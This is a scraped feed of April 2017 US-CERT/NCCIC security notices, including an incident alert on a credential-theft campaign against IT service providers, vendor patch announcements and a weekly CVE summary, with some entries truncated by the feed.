Fri, 28 Apr 2017 02:55:37 +0000Original release date: April 27, 2017
The Federal Trade Commission (FTC) recommends that consumers who are affected by identity theft file a report at IdentityTheft.gov—a one-stop resource to help you report and recover from identity theft. Information provided there includes checklists, sample letters, and links to other resources.
Thu, 27 Apr 2017 22:50:51 +0000Original release date: April 27, 2017 | Last revised: April 28, 2017 Systems Affected Networked Systems Overview The National Cybersecurity and Communications Integration Center (NCCIC) has become aware of an emerging sophisticated campaign, occurring since at least May 2016, that uses multiple malware implants. Initial victims have been identified in several sectors, including Information Technology, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems. Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.Although this activity is still under investigation, NCCIC is sharing this information to provide organizations information for the detection of potential compromises within their organizations.NCCIC will update this document as information becomes available.For a downloadable copy of this report and listings of IOCs, see:Report (.pdf)IOCs (.xlsx)IOCs (STIX)To report activity related to this Incident Report Alert, please contact NCCIC at NCCICCustomerService@hq.dhs.gov or 1-888-282-0870. Description Risk EvaluationNCCIC Cyber Incident Scoring System (NCISS) Rating Priority Level (Color) Yellow (Medium)A medium priority incident may affect public health or safety, national security, economic security, foreign relations, civil liberties, or public confidence.DetailsWhile NCCIC continues to work with a variety of victims across different sectors, the adversaries in this campaign continue to affect several IT service providers. To achieve operational efficiencies and effectiveness, many IT service providers often leverage common core infrastructure that should be logically isolated to support multiple clients.Intrusions into these providers create opportunities for the adversary to leverage stolen credentials to access customer environments within the provider network.Figure 1: Structure of a traditional business network and an IT service provider networkTechnical AnalysisThe threat actors in this campaign have been observed employing a variety of tactics, techniques, and procedures (TTPs). The actors use malware implants to acquire legitimate credentials then leverage those credentials to pivot throughout the local environment. NCCIC is aware of several compromises involving the exploitation of system administrators’ credentials to access trusted domains as well as the malicious use of certificates. Additionally, the adversary makes heavy use of PowerShell and the open source PowerSploit tool to enable assessment, reconnaissance, and lateral movement.Command and Control (C2) primarily occurs using RC4 cipher communications over port 443 to domains that change IP addresses. Many of these domains spoof legitimate sites and content, with a particular focus on spoofing Windows update sites. Most of the known domains leverage dynamic DNS services, and this pattern adds to the complexity of tracking this activity. Listings of observed domains are found in this document’s associated STIX package and .xlsx file. The indicators should be used to observe potential malicious activity on your network.User impersonation via compromised credentials is the primary mechanism used by the adversary. However, a secondary technique to maintain persistence and provide additional access into the victim network is the use of malware implants left behind on key relay and staging machines. In some instances, the malware has only been found within memory with no on-disk evidence available for examination. To date, the actors have deployed multiple malware families and variants, some[...]
Wed, 26 Apr 2017 13:03:54 +0000Original release date: April 26, 2017
Users and administrators are encouraged to review Adobe Security Bulletin APSB17-14 and apply the necessary updates.
Tue, 25 Apr 2017 22:15:30 +0000Original release date: April 25, 2017
Applications developed using the Portrait Displays software development kit (SDK), versions 2.30 through 2.34, contain a critical vulnerability. A local attacker could exploit this vulnerability to take control of an affected system.
The affected applications, pre-installed on some Fujitsu, HP, and Philips devices, are:
US-CERT recommends users and administrators review Vulnerability Note VU#219739 for additional information and refer to their device vendors for appropriate patches. Portrait Displays has released a patch for its SDK software.
Tue, 25 Apr 2017 12:47:59 +0000Original release date: April 25, 2017
IBM has released a security update to address a vulnerability in IBM Domino server IMAP EXAMINE. An attacker could exploit this vulnerability to take control of an affected system.
Available updates include:
Mon, 24 Apr 2017 12:11:53 +0000Original release date: April 24, 2017 The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis. High VulnerabilitiesPrimaryVendor -- ProductDescriptionPublishedCVSS ScoreSource & Patch Infoapache -- tomcatIn Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could result in the same Processor being used for multiple requests which in turn could lead to unexpected errors and/or response mix-up.2017-04-177.5CVE-2017-5651BIDCONFIRMMLISTapache -- traffic_serverApache Traffic Server 6.0.0 to 6.2.0 are affected by an HPACK Bomb Attack.2017-04-177.8CVE-2016-5396CONFIRMcanonical -- ubuntu_linuxThe crontab script in the ntp package before 1:4.2.6.p3+dfsg-1ubuntu3.11 on Ubuntu 12.04 LTS, before 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10 on Ubuntu 14.04 LTS, on Ubuntu Wily, and before 1:4.2.8p4+dfsg-3ubuntu5.3 on Ubuntu 16.04 LTS allows local users with access to the ntp account to write to arbitrary files and consequently gain privileges via vectors involving statistics directory cleanup.2017-04-147.2CVE-2016-0727MISCBIDSECTRACKUBUNTUCONFIRMCONFIRMffmpeg -- ffmpegFFmpeg before 2017-03-05 has an out-of-bounds write caused by a heap-based buffer overflow related to the ff_h264_slice_context_init function in libavcodec/h264dec.c.2017-04-147.5CVE-2017-7859BIDMISCffmpeg -- ffmpegFFmpeg before 2017-02-07 has an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame function in libavcodec/pictordec.c.2017-04-147.5CVE-2017-7862BIDMISCMISCffmpeg -- ffmpegFFmpeg before 2017-02-04 has an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame_common function in libavcodec/pngdec.c.2017-04-147.5CVE-2017-7863BIDMISCMISCffmpeg -- ffmpegFFmpeg before 2017-01-24 has an out-of-bounds write caused by a heap-based buffer overflow related to the ipvideo_decode_block_opcode_0xA function in libavcodec/interplayvideo.c and the avcodec_align_dimensions2 function in libavcodec/utils.c.2017-04-147.5CVE-2017-7865BIDMISCMISCffmpeg -- ffmpegFFmpeg before 2017-01-23 has an out-of-bounds write caused by a stack-based buffer overflow related to the decode_zbuf function in libavcodec/pngdec.c.2017-04-147.5CVE-2017-7866BIDMISCMISCflatcore -- flatcore-cmsSQL Injection vulnerability in flatCore version 1.4.6 allows an attacker to read and write to the [...]
Thu, 20 Apr 2017 00:17:53 +0000Original release date: April 19, 2017
Drupal has released an advisory to address a vulnerability in Drupal core 8.x versions prior to 8.2.8 and 8.3.1. A remote attacker could exploit this vulnerability to obtain sensitive information.
Thu, 20 Apr 2017 00:14:27 +0000Original release date: April 19, 2017
Cisco has released updates to address several high-impact vulnerabilities affecting multiple products. These and other lower-impact vulnerabilities are listed at Cisco Security Advisories and Alerts. A remote attacker could exploit one of the high-impact vulnerabilities to cause a denial-of-service condition.
Users and administrators are encouraged to review the following Cisco Security Advisories and apply the necessary updates:
Thu, 20 Apr 2017 00:04:38 +0000Original release date: April 19, 2017
Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system.
Thu, 20 Apr 2017 00:02:20 +0000Original release date: April 19, 2017
Google has released Chrome version 58.0.3029.81 for Windows, Mac, and Linux. This version addresses multiple vulnerabilities that an attacker may exploit to take control of an affected system.
Users and administrators are encouraged to review the Chrome Releases page and apply the necessary updates.